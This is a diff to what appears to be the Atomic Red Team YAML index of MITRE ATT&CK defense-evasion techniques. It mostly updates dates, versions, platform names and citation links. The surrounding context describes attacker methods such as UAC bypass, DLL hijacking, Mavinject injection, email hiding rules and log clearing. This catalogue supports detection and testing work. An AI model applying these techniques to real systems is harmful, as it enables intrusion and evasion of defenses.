+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,7 +1037,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests:
     - name: New-Inbox Rule to Hide E-mail in M365
@@ -1006,7 +1092,7 @@ defense-evasion:
         elevation_required: false
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1077,11 +1163,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1149,7 +1234,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1180,7 +1264,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1217,13 +1301,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1324,7 +1406,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1355,7 +1436,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1389,13 +1470,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1447,12 +1526,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1532,12 +1610,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1556,7 +1633,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1570,7 +1646,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1597,8 +1672,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1629,7 +1704,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1686,7 +1762,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1739,7 +1814,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1755,11 +1830,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1805,8 +1879,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1816,9 +1890,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1845,7 +1918,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1869,8 +1942,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1934,11 +2005,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1959,8 +2029,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -2004,12 +2074,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -2029,9 +2098,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2051,9 +2125,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2070,6 +2143,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2103,7 +2180,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests:
     - name: Add Federation to Azure AD
@@ -2249,7 +2325,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2277,8 +2353,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2321,7 +2395,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2345,12 +2419,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2440,13 +2512,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2470,7 +2541,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2495,8 +2566,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2525,7 +2594,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2551,8 +2620,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2604,18 +2671,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2631,8 +2697,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2646,7 +2712,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2672,6 +2738,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2699,12 +2769,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2800,7 +2869,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2867,7 +2935,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2932,11 +2999,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2997,12 +3063,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -3028,7 +3093,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -3070,7 +3135,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -3112,7 +3176,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -3135,36 +3199,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
